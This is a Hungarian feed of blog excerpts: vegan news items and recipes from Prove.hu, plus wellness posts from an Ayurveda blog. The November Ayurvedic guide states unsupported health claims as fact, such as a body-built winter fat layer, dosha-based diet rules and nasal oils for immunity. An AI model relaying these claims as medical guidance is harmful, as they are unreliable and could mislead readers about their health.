Marhaszállítmány miatt bűzlött Fokváros, halott állatokat is találtak a hajón
2024. március 5. Prove - a világ vegán szemmel
A fokvárosi hatóságok vizsgálatot indítottak a bűz forrásának felderítésére, a nyomok pedig a kikötőben várakozó marhaszállítmányhoz vezettek. Állatvédők szerint ez is mutatja, hogy felül kellene vizsgálni ezt a szállítási gyakorlatot, amely ,,érző lényeknek okoz szükségtelen szenvedést. Az, hogy még mindig virágzik az élőállat-export, gyakran kritizált tény az állatvédők részéről. Többek között az RSPCA (Royal Society… The post Marhaszállítmány miatt bűzlött Fokváros, halott állatokat is találtak a hajón appeared first on Prove.hu.
Bikaként öklelheti fel a következő évtizedet a növényi tej piaca
2024. március 3. Prove - a világ vegán szemmel
Hogy milyen mértékben, arról vitatkoznak az elemzők, de az világosan látszik, hogy bővülhet a közeljövőben a növényi tej piaca. A legnagyobb sikere Észak-Amerikában van ennek a terméknek, ez pedig várhatóan nem is változik mostanság. A növényi tej piacának értéke 2032-re 51,87 milliárd dollár lehet globális szinten a The Brainy Insights jelentése szerint. A piackutató azzal… The post Bikaként öklelheti fel a következő évtizedet a növényi tej piaca appeared first on Prove.hu.
Főszerepben a narancs: 5 télbúcsúztató vegán recept
2024. február 25. Prove - a világ vegán szemmel
A narancs nem csak facsarva jó. Tél végéhez közeledve olyan recepteket gyűjtöttünk össze, amelyek kreatívan használják ki a gyümölcs sajátosságait. Az összeállításban igyekeztünk figyelni a sokszínűségre, hogy mindenki megtalálja a számára megfelelő receptet. Az alábbi válogatásban egyaránt találhatók sós és édes receptek, ahogy van köztük gyorsan elkészíthető és egészséges is, ami megfelel a teljes értékű… The post Főszerepben a narancs: 5 télbúcsúztató vegán recept appeared first on Prove.hu.
Valentin nap
2024. február 14. Élj harmóniában
Február 14. Valentin nap Sajnos évről, évre látom ilyenkor sokan hörögnek, morognak, úgy reagálnak rá, mintha azt mondanák nekik valamilyen áremelés lesz:) Ennek számos oka lehet, pl. szerelmi csalódás, fásultság, depresszió, párkapcsolati nehézségek, szingliség vagy csak gyerekes viselkedés, egyfajta duzzogás, elzárkózás attól, amit mások is csinálnak. Az lenne a jó ha az év minden napja szólna a szerelemről, a szeretetről, az Édesanyákról, a nőkről, környezetvédelemről, költészetről, etc.. .. Sajnos társadalmilag nem tartunk ott, hogy minden nap tudatosan, hálával gondoljanak az emberek akár a párjukra vagy a nőkre vagy éppen a környezetvédelemre... ezért vannak amolyan dedikált napok. Egy egy ilyen dedikált nap leginkább arra jó, hogy felhívja a figyelmet az adott téma fontosságára. Ilyenkor elgondokodhatunk... mit tehetek a párkapcsolatomért, a társamért, a szerelem lángjának fenntartásáért Ha Te és a párod tudsz az év minden napján hálával és szeretettel gondolni a másikra, tudatosítod magadban minden nap miért szeretted meg őt, mik az ő különös kincsei, képességei, mit tisztelsz benne, mit szeretsz benne, hálás vagy azért hogy mellette hajthatod álomra a fejed és mellette ébredhetsz. Ha meglepitek egymást apró dolgokkal, becsempészel néhány szerelmes verssort a kabátja zsebébe, ott várja egy szál virág az asztalon, beviszed neki a reggeli teát, elviszed kirándulni, piknikelni, vacsorázni, színházba ki mit szeret:) megleped valami aprósággal aminek örül és tudatosan figyeltek arra, hogy a kapcsolatotok jól működjön, kimondod, tudtára adod az érzéseidet, megbeszélitek a dolgokat, nem őrizgettek magatokban sérelmeket, neheztelést akkor valóban mit nektek Valentin nap, hiszen minden nap ilyen az életedben. Az életedben minden aminek figyelmet szentelsz virágozni fog. Senki nem azért választ valakit társnak, hogy majd pár év után megkeserítsék egymás életét, bosszantsák egymást. A szerelem olyan, mint egy mag.. elveted és öntözni gondozni kell, hogy virágozzon. Ha valaki nem gondoz egy kertet, ne csodálkozzon ha gazos lesz, bosszúságot okoz és nem gyönyörködhet benne... Sokan a szerelmet úgy gondolják, hogy házasság után, az már úgy van... Ahhoz hogy a szerelem virágozzon, a kapcsolat jól működjön szükséges energiát, időt, pénzt szánnod rá. Sikeres vagy a munkádban? mennyi időt, pénzt, energiát szántál arra, hogy az adott szakterületen sikeres legyél?Hány évet tanultál, mennyi továbbképzést végeztél el, mennyi könyvet, cikket olvastál? Vajon hányan tesznek ugyanennyi energiát a szerelembe, a házasságukba is mint a szakmai karrierbe? Mennyi könyvet olvasol, hány képzést végzel el ahhoz és mennyit változtatsz a dolgaidban, hogy fenntartsátok a szerelmet, hogy jobb társ legyél, jobb férj vagy jobb feleség, mennyi időt töltesz a kedveseddel csak rá koncentrálva? Sokaktól hallom ugyan mi nem érünk erre rá, meg nem költünk ilyenekre... sok sok ember nem ad teret, időt az életben a szerelemnek... gondolja ott van a sok feladat inkább arra koncentrál, na meg minek egy vacsora, új ruha (sok nő még rejtegeti is az új ruhadarabokat a férje elől) , kettesben töltött este még a gyerekekre vigyázást is meg kell oldani... valóban macera és pénz egy egy romantikus program vagy valamilyen ajándék. Sajnos a válás sokkal drágább dolog és érzelmileg nagyon megterhelő, mint lett volna egy egy szabadnap vagy hétvége kettesben, egy csinos ruha, egy szép fülbevaló, egy romantikus esti séta, egy Margitszigeti piknik vagy egy virágcsokor... Nincs az a nő aki a lelke mélyén ne örülne, ha a párja meglepi valamivel. Drága Urak... nem hallgatni arra, amikor a hölgy elsőre elutasító és morog... érdemes kitartó lovagnak lenni Szóval ma Valentin nap van. Légy pozitív és lásd mindenben a jót, a mai nap egy lehetőség arra, hogy közelebb kerülj a szerelem érzéséhez, a párodhoz. Minden kapcsolatban vannak nehézségek, de ha tudatosan őrzöd a szerelmet, akkor könnyen átsegíthetitek egymást a nehezebb időszakokon is. Ha még nincs társad... akkor se búslakodj a mai napon:) Úgy örülj mások szerelmének, mintha a sajátod lenne. Lepd meg magad valamivel... egy szál virággal, egy marcipánszívvel, este nézegesd a csillagokat, bármi ami neked örömet okoz. Gondold át mit is szeretnél a párkapcsolat területén és csinálj az életedben helyet és időt egy szerelemnek. Nem az a lényeg, hogy párkapcsolatban élsz vagy egyedül. A mai nap egy lehetőség, hogy változtass... a gondolkodásodon, céljaidon, hozzáállásodon, az életedben a prioritásokon... Örömteli, szerelmes Valentin napot kívánok szeretettel Kati A képen Auguste Rodin szobra, A csók látható. #valntin #valentinnap #szerelem #párkapcsolat #roden #acsók
A madárinfluenza terjedéséért a fogyasztók is felelősek
2024. február 9. Prove - a világ vegán szemmel
A PETA állatvédő szervezet új kommunikációs kampánya az évek óta tartó madárinfluenza-járványra irányítja a figyelmet. A reklámkampány szlogenje nem udvariaskodik, a fogyasztók felelősségét helyezi középpontba. Az állatvédő szervezet a baromfitelepeket tökéletes víruskeltetőknek tartja, ez hozzájárult ahhoz, hogy az egész világon elterjedhessen. A PETA nemzetközi állatvédő szervezet legújabb reklámkampányában a madárinfluenza kerül górcső alá - olvasható… The post A madárinfluenza terjedéséért a fogyasztók is felelősek appeared first on Prove.hu.
Bagel - alaprecept
2024. február 7. Prove - a világ vegán szemmel
A bagel jól ismert édes tésztájáról és legtöbbször sós töltelékéről, itthon azonban mégsem annyira elterjedt. Ha kedvet kaptál a bagelhez, de az itthoni boltokban nem jutsz hozzá, ne búslakodj. Most elhoztunk a bagel alapreceptjét, amit egyszerű hozzávalókból otthon is könnyedén elkészíthetsz. Bagelvariációk A bagel tésztája alapvetően édeskés, és legtöbbször sós töltelék kerül bele. A legnépszerűbb… The post Bagel - alaprecept appeared first on Prove.hu.
Itt az új HappyCow-lista a 20 leginkább vegánbarát városról
2024. január 24. Prove - a világ vegán szemmel
A leghíresebb vegán étteremkereső alkalmazás ismét megjelentette a listát, amelyben a leginkább vegánbarát városait rangsorolja. Számos kritérium alapján döntik el, hogy melyik város melyik helyre jogosult a listában. Ezek közé tartozik a vegán éttermek és üzletek száma, a vegán közösség aktivitása és az éves növekedés. Az öreg kontinens most is jól szerepelt, a húsz városból… The post Itt az új HappyCow-lista a 20 leginkább vegánbarát városról appeared first on Prove.hu.
Kókusztejes sütőtökkrémleves
Sütőtökkrémlevest sósan, fűszeresen szeretem készíteni, bár tudom, hogy többen édesen szeretik. Általában főzőtejszínt használok, de most egy kis csavart szerettem volna vinni a receptbe, ezért sűrített kókusztejjel és ahhoz illő pikáns fűszerekkel készült. Érdemes próbát tenni. Hozzávalók: 1 kg sütőtök 2 ek. olaj 2 dl konzerv kókusztej 1 fej vöröshagyma 2 gerezd fokhagyma egy ujjnyi […]
További szenvedéstől és eutanáziától mentettek meg 10 kísérleti malacot
2024. január 9. Prove - a világ vegán szemmel
Egy coloradói laboratóriumból szabadult ki tíz kísérleti malac a Heartwood Haven állatmenhely jóvoltából. Megmentőik nem tudják, pontosan milyen teszteket végeztek rajtuk, de egy dolog biztos: most már békés életük lehet. Tíz malacot mentett ki a Heartwood Haven állatmenhely egy coloradói állatkísérleti laboratóriumból. Az állatok körülbelül kétévesek, és orvosi teszteket hajtottak rajtuk végre. A Heartwood Havenben… The post További szenvedéstől és eutanáziától mentettek meg 10 kísérleti malacot appeared first on Prove.hu.
Az egyik legkegyetlenebb kutyaszánhúzó verseny ellen tüntettek állatvédők
2023. december 26. Prove - a világ vegán szemmel
A rendőrség négy aktivistát tartóztatott le és vádolt meg rongálással, akik az Iditarod kutyaszánhúzó verseny ellen tüntettek Englewoodban, a Liberty Media főépületénél. A letartóztatottak között egy édesanya és egy helyi egyetemista is volt. A szánhúzó versenyen már több mint száz eb vesztette életét. A PETA nyomására a nagy nemzetközi szponzorok közül sokan visszavonták a támogatásukat.… The post Az egyik legkegyetlenebb kutyaszánhúzó verseny ellen tüntettek állatvédők appeared first on Prove.hu.
Laktató vegán reggeli - mogyoróvajas-lekváros-banános szendvics
2023. december 13. Prove - a világ vegán szemmel
Milyen egy igazán laktató vegán reggeli? Ez a mogyoróvajas-lekváros-banános szendvics például minden kritériumnak megfelel. Ráadásul elkészíteni sem nagy ördöngösség. Ez a furcsaság a húgom éjféli nasimániájának eredménye: az amerikai mogyoróvajas-lekváros szendvics és a valamivel egészségesebb mogyoróvajas-banános pirítós szörnyszülött gyermeke. Én inkább reggelinek preferálom, mert ha édesszájú kedvemben ébredek, de a lekváros pirítós valahogy nem elégséges,… The post Laktató vegán reggeli - mogyoróvajas-lekváros-banános szendvics appeared first on Prove.hu.
Megdöbbentő az ételpazarlás a húsiparban - évente 18 milliárd állat végzi a kukában
2023. december 7. Prove - a világ vegán szemmel
Három környezettudósnak köszönhetően most először tudunk számokat kapcsolni az állatiparban értelmetlenül elpusztult állatokhoz. Az ételpazarlás elszomorító mértékét eddig is ismerhettük, de arról nem volt kutatás, hány haszonállat végzi végül a kukában. Habár vegán szempontból minden fogyasztásra szánt állat halála értelmetlen, fontos, hogy ismerjük ezeket a számadatokat. Csökkentésükkel ugyanis nemcsak az éghajlatváltozás, de az állatok szenvedése… The post Megdöbbentő az ételpazarlás a húsiparban - évente 18 milliárd állat végzi a kukában appeared first on Prove.hu.
Nyers vegán csokis-narancsos trüffelgolyók
2023. december 5. Prove - a világ vegán szemmel
Nem tudom, hogy mindenki így van-e vele, de a narancsos desszertek illatáról nekem mindig a hideg, téli esték jutnak eszembe. Ezek a csokis-narancsos trüffelgolyók pedig még a vegán mikuláscsomagba is beleillenek. A legtöbb szupermarket egyelőre nem kecsegtet túl széles növényi alapú édességválasztékkal, de búslakodásra nincs ok: ez a vegán bonbon seperc alatt, néhány összetevőből elkészül,… The post Nyers vegán csokis-narancsos trüffelgolyók appeared first on Prove.hu.
Egy húsiparellenes reklámkampány, amire mindenki nemet mondott
2023. december 3. Prove - a világ vegán szemmel
Észak-Karolina az egyik legnagyobb sertéshús-előállító az Egyesült Államokban. A több mint 8 millió malaccal az itt lakók leginkább csak a tányérjukon és az éttermekben találkoznak. Most két fotós úgy döntött, megmutatják, amit az emberek nem látnak. A reklámkampány viszont nem az állatok szenvedésére vagy a velük való kegyetlen bánásmódra, hanem a szeretetre alapoz. Ahogy arra… The post Egy húsiparellenes reklámkampány, amire mindenki nemet mondott appeared first on Prove.hu.
Megrázó felvételek égő bikákról, az idei Toro Jubilo fesztiválról
2023. november 28. Prove - a világ vegán szemmel
A spanyolországi Medinaceli községben minden év novemberében megrendezik a Toro Jubilo fesztivált. A bikavíváshoz és bikafuttatáshoz hasonlóan ennek a spanyol hagyománynak is szerves része az állati szenvedés. Az esemény alkalmával egy védtelen bika szarvaira szurokkal átitatott masszát helyeznek, amit aztán meggyújtanak. A hagyomány elvileg a keltibérek Karthágó ellen aratott győzelmét ünnepli, más források viszont pogány… The post Megrázó felvételek égő bikákról, az idei Toro Jubilo fesztiválról appeared first on Prove.hu.
Ezt gondolják a Facebook-felhasználók az éghajlatváltozásról
2023. november 27. Prove - a világ vegán szemmel
Száznál is több ország közösségi médiás felhasználóit kérdezték az éghajlatváltozással kapcsolatban. A felmérés pontosabb képet fest a Facebook-felhasználók klímaváltozással kapcsolatos elképzeléseiről, véleményéről, vélekedéseiről. Megtudtuk, hogy a magyar emberek például nagyon tájékozottnak tartják magukat a kérdést illetően. A Yale Program on Climate Change Communications a Metával együttműködve kutatta a közösségi média felhasználóinak klímaváltozáshoz fűződő viszonyát. Azért… The post Ezt gondolják a Facebook-felhasználók az éghajlatváltozásról appeared first on Prove.hu.
Vegán almás-fahéjas rizspuding
2023. november 24. Prove - a világ vegán szemmel
Reggeli, desszert vagy uzsonna: ez az almás-fahéjas rizspuding a nap bármely szakában tökéletes, egészséges édesség lehet. A rizspuding az egyik legegyszerűbb komfortétel, és pont ebben rejlik a nagyszerűsége is. Ez a fűszeres, almás változat a hideg hónapokban, melegen tálalva igazi melegítő finomság, az illatától pedig az egész konyhádat átjárja majd a téli hangulat. A jó… The post Vegán almás-fahéjas rizspuding appeared first on Prove.hu.
Fakulnak a színek, fogynak a díszek...
2023. november 18. Élj harmóniában
Fakulnak a színek, fogynak a díszek.... a fákról lassan lehullik minden ékes levelük, elveszítik lombkoronájukat, és visszahúzódnak belső, csendes világukba... Közeleg a tél... ilyenkor a természetben minden visszavonul, elcsendesül, egyes élőlények hibernálják magukat, míg vannak akik délre költöznek. Lassan ránézésre inaktív lesz a táj, de valójában csak visszavonul és készül a tavaszi megújulásra. A tél az emberek számára is a visszavonulás, elcsendesedés, befelé fordulás ideje... ilyenkor annak érdekében, hogy tavasszal megújult energiákkal éljük az életünket, fontos figyelmet szentelni a pihenésnek, elcsendesedésnek....
Több tízezer malacot öltek le Olaszországban a sertéspestis miatt
2023. november 13. Prove - a világ vegán szemmel
Az országban hatvan éve nem volt ekkora sertéspestisjárvány, veszélybe került a teljes ellátási lánc. A vírus terjedésének megakadályozása érdekében harmincezernél is több állatot öltek le a hatóságok. Mivel a kórokozó sok sertéshúson alapuló élelmiszerben is fennmaradhat, ezért könnyen az országhatárt is átlépheti. A sertésekre nézve szinte biztosan halálos kimenetelű afrikai sertéspestis rohamos terjedése miatt több… The post Több tízezer malacot öltek le Olaszországban a sertéspestis miatt appeared first on Prove.hu.
Puha és szaftos csokis-cukkinis muffin (gluténmentes opció)
2023. november 7. Prove - a világ vegán szemmel
Csokis-cukkinis muffin, ami egyszerre puha, szaftos és édes? Ha már régóta keresel egy jó vegán muffinreceptet, akkor ezt mindenképpen ki kell próbálnod. A sütőtököt és az édesburgonyát már elfogadtuk mint desszertalapanyagot, de a cukkinit nem gyakran látni édes ételek hozzávalóiban. Pedig az előbbiekhez hasonlóan szaftossá teszi a süteményeket. Egyet biztosan megígérhetünk: nem fogod kiérezni a… The post Puha és szaftos csokis-cukkinis muffin (gluténmentes opció) appeared first on Prove.hu.
A 7 legfinomabb vegán sütemény, hogy édes legyen a november
2023. november 5. Prove - a világ vegán szemmel
Nálunk az ősz egyet jelent az illatos, fahéjas, fűszeres süteményekkel. Alma, dió, sütőtök, fahéj - bármi jól jön, amit az évszak ad nekünk. Mindehhez adunk némi inspirációt is, összegyűjtöttük a hét legfinomabb vegán sütemény receptjét. Már korábban elhoztuk nektek a legjobb őszi krémleves- és sütőtökös receptjeinket, most azonban a hét kedvenc őszi vegán süteményünk van… The post A 7 legfinomabb vegán sütemény, hogy édes legyen a november appeared first on Prove.hu.
Egészségmegőrzés novemberben - aktualitások
2023. november 4. Élj harmóniában
November van... sorra jönnek az
ismerősök és a tanulóim néhányan puffadnak, nehezebben emésztenek vagy befeszült a nyakuk vagy éppen a
derekuk fáj, vannak akinek száraz a bőrük, vannak akik szoronganak, rosszul alszanak, vagy köhögnek, folyik az orruk, megfáztak... Az ájruvéda több ezer éves tudással
és tapasztalattal rendelkezik a világ működéséről és a környezeti hatásokról. Ha Te is megfigyeled a
természetet novemberben a hőmérséklet jelentősen lecsökken, a hideg egyre
tartósabban lesz jelen az életünkben, egyre erősödik a hideg szél, a hideg szeles napokat, nyirkos,
esős napok váltják és sajnos a nappalok is egyre
rövidebbek. A sötétség, a hideg és
szél az emberi szervezetre is hatást gyakorol. A november a visszavonulás ideje a természetben és az emberek számára is. A
hideg miatt egyre kevesebb időt töltünk a szabadban és eljön a beltéri
tevékenységek ideje. Lehet, hogy érzed is, hogy Te is visszahúzódóbb vagy és
jobban vágysz a meghitt, otthoni, családi légkörre, mint a zsúfolt helyekre.
Jól fűtött, meleg otthonunk egy igazi védelem a téli hideg időjárásban. Az állandó fűtés miatt könnyen elfordulhat, hogy kiszárad a nyálkahártyánk és
száraz köhögést, torok kaparást vagy éppen orrvérzést is tapasztalhatunk. A
légutak védelmének érdekében érdemes figyelni a párásításra is. A párásítás mellett használhatsz
légzést könnyítő vagy éppen hangulat javító illóolajokat is.
Az időjárás változásai és az óraátállítás miatt, a bioritmusod is zavart
szenved, fáradtabbnak érzheted magad. A szervezetednek, egy két hét szükséges, mire újra egyensúlyba kerül. Addig is kerüld az esti programokat, éjszakázást,
túl sok tevékenységet, engedd meg a szervezetednek a pihenést, próbálj korán
lefeküdni.
Napközben ha süt a nap használd ki és sétálj a napsütésben. Ragadj meg
minden alkalmat, hogy napfénnyel töltekezz. Egy olyan időszak kezdődik, hogy
nem tudhatjuk mikor lesz a következő alkalom, amikor felhőmentesen süt a nap. Ahogy a természetben is láthatod, hogy a növények kiszáradnak, úgy a
szárazság a szervezetedben is megnyilvánul.
A bőr és az izmok vérellátása csökken, így a bőröd kicsit összehúzódik,
kiszárad és az izmokban is feszültség keletkezik. A vér ahogy visszahúzódik a
tested belseje felé, a kezek és a lábak hidegebbé válnak és a gyomorban viszont
erősebb lesz a vérellátás, ami erősebb étvágyat eredményez.
Ne most kezdj fogyókúrázni:) Annak érdekében, hogy télre védekező
zsírréteget tudj növeszteni, a tested kevésbé fogja kívánni az intenzív
testmozgást és sokkal jobban vágyik majd a kalóriadúsabb étkezésekre.
A hideg miatt megnő a szervezeted belső igénye a tartalmasabb, nehezebb,
zsírosabb ételek iránt. A tested novemberben alapozza meg a téli védekező
zsírrétegedet, ezért ne lepődj meg ha erősebb étvágyat tapasztalsz és többet
eszel - ez teljesen természetes. A szervezeted ilyenkor meghálálja a plusz
kalóriákat, melyek biztosítják a tested téli melegen tartást.
A legjobb zsírforrás a ghí - tisztított vaj. A Dm-ben ,Müllerben is kapható
bio ghí, de itt a blogon is találsz receptet, hogyan tudod elkészíteni. https://eljharmoniaban.blogspot.com/2015/05/hogyan-keszits-ghit-tisztitott-vajat-es.html Az
ételeket készítsd ghível és amikor elkészült a tálalás előtt, csorgass az
ételre egy kanál ghít vagy olívaolajat.
Általában, a mikor nagyon erős édesség utáni vágyad van, a szervezeted zsírra vágyik
valójában. Kerüld a finomított cukrokat, egyszerű szénhidrátokat, fehérlisztes
termékeket, inkább teljes értékű ételeket, összetett szénhidrátokat kezdj fogyasztani.
Tanácsok Vata alkatúaknak
Akik Vata alaktúaknak az év ezen időszakában kell különösen
odafigyelni egyensúlyuk fenntartására. A
Vata-k a hideg és szél hatására ilyenkor tapasztalhatnak feszülő izmokat, nyakmerevséget,
fájdalmakat a testben, székrekedést, puffadást, száraz köhögést, idegességet, szorongást,
alvás zavart, bőrszárazságot. A hirtelen hőmérséklet csökkenés könnyen hoz létre meghülést a vata emberek
szervezetében és a legyengült iszervezetük miatt miatt fogékonyabbá válhatnak a kórokozókra
is.
Ne engedd magad kihűlni, öltözz melegen és fogyassz a nap folyamán
rendszeresen meleg folyadékot, gyógyteákat, forralt vizet. Ideális választás a Vata tea, amit készen is meg tudsz vásárolni vagy készíthetsz is magadnak. Recetet a blogon itt találod: https://eljharmoniaban.blogspot.com/2023/11/vata-tea.html Végezz naponta olajos önmasszázst, ez felmelegíti a tested, segít védekezni
a hideg ellen, erősíti a szervezeted védekező képességét.
https://eljharmoniaban.blogspot.com/2016/03/hogyan-vegezz-otthoni-ajurvedikus.html Ne hagyj ki étkezést, próbálj minden nap ugyanazon időben reggelizni, ebédelni,
vacsorázni.
Egyél tápláló, de könnyen emészthető, frissen készült, meleg, szaftos,
zsíros, édes, földelő ételeket. Ilyenkor természetes, ha a tested zsírra vágyik -
ghí, vaj, olívaolaj na és a jó kis magok, mint a dió, szezámmag... ne fukarkodj
egyikkel sem. A magokat főzd, süsd ételbe vagy áztasd fogyasztás előtt.
A vataknak tejtermékek és búzafélék is ideális választás november hónapra. Novemberben jöhetnek a finom édességek, sütemények. Készíts egészséges
alapanyagokból édességeket, teljes értékű barna nádcukorral vagy
datolyacukorral, teljes értékű lisztekkel süteményeket. itt a blogon nagyon sok
muffin, sütemény és keksz receptet találhatsz. https://eljharmoniaban.blogspot.com/search/label/receptek
Egy szuper étel ilyenkor a puri, ami egyfajta ghíben kisülét lepénykenyér. https://eljharmoniaban.blogspot.com/2019/10/puri-friss-elesztomentes-indiai.html Ideális választás egy Vata kitchari is https://eljharmoniaban.blogspot.com/2023/09/kitchari-vata.html Kerüld a hideg ételeket, italokat, nyers zöldséget, nyers gyümölcsöket és a
száraz ételeket - pl pattogatott kukorica, puffasztott ételek. valamint kerüld a csípős, fanyar és keserű ízeket.
Ne fogyassz aszalt gyümölcsöket, mert nagyon szárító a hatásuk. Ideális a
vata-knak a kompot, párolt gyümölcsök és az aszalt gyümölcsök áztatva.
Feküdj le 22 óra előtt. Reggel ne kelj túl korán, ha teheted aludj 7 óráig. Ha úgy érzed napközben fáradt vagy nyugodtan dőlj
le picit.
A Vata-k kerüljék a megerőltető testmozgást, könnyed jógázás, nyújtás vagy
torna ideális lehet.
Tanácsok Pitta alkatúaknak
A pittáknak, kifejezetten kedvező a november. Végre lehűlt az időjárás
élvezik, hogy nagy sétákat tehetnek a természetben, nincs elviselhetetlen
hőség. Ez egy ideális időszak a pittáknak.
Végezz naponta, vagy hetente néhány alkalommal olajos önmasszázst.
A pittáknak is fontos, a tápláló ételek fogyasztása. Étvágyuk novemberben
igencsak megnő. Ne hagyj ki étkezést, próbálj minden nap ugyanazon időben reggelizni,
ebédelni, vacsorázni. A pittáknak is kellenek a friss, tápláló, zsíros ételket.
Természetes, ha a tested zsírra vágyik - ghí, vaj, olívaolaj. A magokat, dióféléket csak kis mennyiségben
fogyaszd. A tejtermékek és búzafélék pittáknak is is ideális választás november
hónapra.
Feküdj le 22 óra előtt. Ha úgy érzed napközben fáradt vagy nyugodtan dőlj le picit.
A Pitta alkatúaknak is fontos, hogy ne terheljék túl magukat
testgyakorlással, inkább a könnyed jógázást, nyújtást vagy tornát részesítsék
előnyben.
Tanácsok Kapha alkatúaknak
A kapha típusok nem kedvelik a hideget. A száraz, szeles napok könnyedséget hoznak számukra, de az esős, párás, felhős napokon tompának, nehéznek
akár depisnek érezhetik magukat.
A kapháknak akárcsak a vata-knak fontos a melegítés. Ha kapha alkatú vagy,
öltözz melegen és fogyassz meleg ételeket, meleg italokat, csípős, fűszeres gyógyteákat.
Végezz hetente néhány alkalommal olajos önmasszázst, ami segíti a tested
melegítését és erősiti az immunításodat.
A kapha alkatúként óvatosan táplákozz, mert nincs szükséged komoly
zsírréteg felépítésére. A túlzott evés, édességek, tejtermékek, kenyérfélék nagyobb
mennyiségű fogyasztása csak a nyálkásodást fogja elősegíteni, így
légy az éktezéseknél mértékletes. A kapháknak mehetnek a keserű és csípős ízek, melyek
segítik csökkenteni a tompaságot.
Feküdj le 22 óra előtt. Reggelj kelj fel leehtőleg 6 óráig, de legkésőbb 7 órakor. A kaphák hajlamosak túlalvásra, nagyon kell figyelniük arra, hogy ne tegyék, mert az fokozza a nehézséget és tompaságot a testükben és elméjükben. Napközben se nagyon pihenj le.
A kaphák hajlamosak a lustaságra, így tudatosan kell minden napjukba beilleszteni egy kis testmozgást. Visszavonulás
A november csodás időszak visszavonulni kicsit a nyüzsgéstől, élvezni az
otthonunk melegét, a nyugit, a családi légkört, a finom ételeket. ez az időszak
a visszavonulás, a földelés, a stabilitás, a nyugalom ideje.
Én ilyenkor rendszeresen szoktam a sütőt használni... nem csak felmelegíti a lakást, de sok tápláló finomságot tudok benne készíteni... kenyér, zsemle, muffin,
pogácsák, sütemények, kekszek. A táplákozásban kiemelt szerepet kap ilyenkor az alma, a dió, a
szezámmag, sütőtök, sárgarépa, cékla és a férjemnek a burgonya.
Szuperek a levesek, dhalok, jó kis főtt gabona ételek, és a kásák. A blogon a
zabkásától kezdve, a leveseken, dhalokon át, megannyi gabonás és különféle
sütemény, keksz, muffin és pogácsa receptet is találsz.
https://eljharmoniaban.blogspot.com/search/label/receptek
Az ételekhez sok melegítő hatású fűszert használok ősszel és télen - gyömbér,
fahéj, kardamom, szerecsendió, szegfűszeg.
A szervezetedet néhány egyszerű praktikával, gyógynövényes készítménnyel is
könnyen tudod támogatni a hideg évszakban..
Ha átfázol, mielőbb szüntesd meg a testben lévő hideget - ehhez vegyél
forró zuhanyt vagy forró lábvizet és készíts melegítő gyógyteákat pl gyömbértea
itt olvashatod vagy a másik kedvencem blogomról a immunerősítő tea itt olvashatod https://eljharmoniaban.blogspot.com/2021/01/ajurvedikus-gyomberes-immunerosito-ital.html
A kórokozók megtapadásának megakadályozására és az orrnyálkahártya
nedvesítésére olajozd az orrjáratod. Az orrdugulás megelőzésére, a nyálka
eltávolítására használj speciális orrolajat (Nasya Oil) A kapháknak sokat segít akár
fejfájás megelőzésére és a belső tompaság felszámolására. A netti is ideális választás
lehet az arcüregek tisztántartására. Örömteli, nyugalmas, töltekezős novemberi napokat kívánok:) szeretettel: KAti Ha szeretnél az Egészséges és tudatos táplálkozásról többet tudni, szeretettel várlak Egészséges táplálkozás és főzőtanfolyamomra. https://www.eljharmoniaban.hu/tudatos-taplalkozas Ha szeretnél az ájurvédikus életmódról, egyéni testalkatodról többet tudni, szeretettel várlak Egészségmegőrzés mesterfokon - ájurvéda életmódtanfolyamomra. https://www.eljharmoniaban.hu/ajurveda-eletmodtanfolyam Ha személyre szabott megoldást szeretnél a problémáidra, jó lenne, ha egy tapasztalt szakember kísérne végig a változás útján lépésről, lépésre személyes igényeidnek megfelelően, szeretettel várlak egyéni ájurvédikus és táplálkozási életmódtanácsadásra. https://www.eljharmoniaban.hu/eletmodtanacsadas
Sokan nem tudják, hogy állati eredetű zselatin is van az édességekben
2023. november 3. Prove - a világ vegán szemmel
Egy vegán édességgyártó megbízásából felmérték a brit lakosok tájékozottságát az édességek hozzávalóival kapcsolatban. A megkérdezettek kétharmada nem tudta, hogy ezek a finomságok állati eredetű hozzávalót, vagyis zselatint is tartalmaznak. Sokan úgy nyilatkoztak, hogy sokkal átláthatóbban kéne ezt közölni. A Candy Kittens vegán édességgyártó kezdeményezésére felmérték, mennyire vannak képben a fogyasztók az édességek állati eredetű hozzávalóival.… The post Sokan nem tudják, hogy állati eredetű zselatin is van az édességekben appeared first on Prove.hu.
A 6 legjobb vegán krémleves hűvösebb napokra
2023. október 29. Prove - a világ vegán szemmel
Amikor nincs kedved a konyhában művészkedni, csak beledobálnál mindent egy fazékba, és hagynád, hogy megfőzze magát, akkor a legtökéletesebb választás a krémleves. Ráadásul amellett, hogy igen laktatóak, felmelegíthetnek a hűvösebb napokon. Ez a hat vegán krémleves bármikor elkészíthető. Használhatunk hozzájuk sárgarépát, céklát, édesburgonyát vagy sütőtököt is. Íme a kedvenc receptjeink: 1. Fokhagymakrémleves Ez az egyszerű… The post A 6 legjobb vegán krémleves hűvösebb napokra appeared first on Prove.hu.
Díjazták a Netflix-sorozat állatkísérletekről szóló jelenetét
2023. október 22. Prove - a világ vegán szemmel
Az Usher-ház bukása című Netflix-sorozat egyik epizódjában említésre kerülnek az állatkísérletek és a velük együtt járó szenvedés. A PETA állatvédő szervezet megköszönte a sorozat rendezőjének, Mike Flanagannek, hogy felhívta a figyelmet az idejétmúlt kutatási módszerre, és a szükségtelenül elpusztult állatok százmillióira. A Netflix kínálatába a napokban került fel a The Fall of the House of… The post Díjazták a Netflix-sorozat állatkísérletekről szóló jelenetét appeared first on Prove.hu.
Namoura vagy basbousa, azaz kókuszos-grízes süti - Csenge és Flóra világkonyhája
2023. október 15. Prove - a világ vegán szemmel
Mediterrán sorozatunk utolsó részéhez érkeztünk, és szokás szerint édes fináléval zárunk: mai receptünk egy grízes, kókuszos kevert sütemény, ami namoura, basbousa, revani és hareesa néven is ismert. Ez a cikk a Csenge és Flóra világkonyhája sorozat tizenhetedik része. További receptekért kattints ide, a házigazdák bemutatkozását pedig itt olvashatod el. Ez az egyiptomi, mór eredetű sütemény… The post Namoura vagy basbousa, azaz kókuszos-grízes süti - Csenge és Flóra világkonyhája appeared first on Prove.hu.
Varázslatos őszi égbolt
2023. október 8. Élj harmóniában
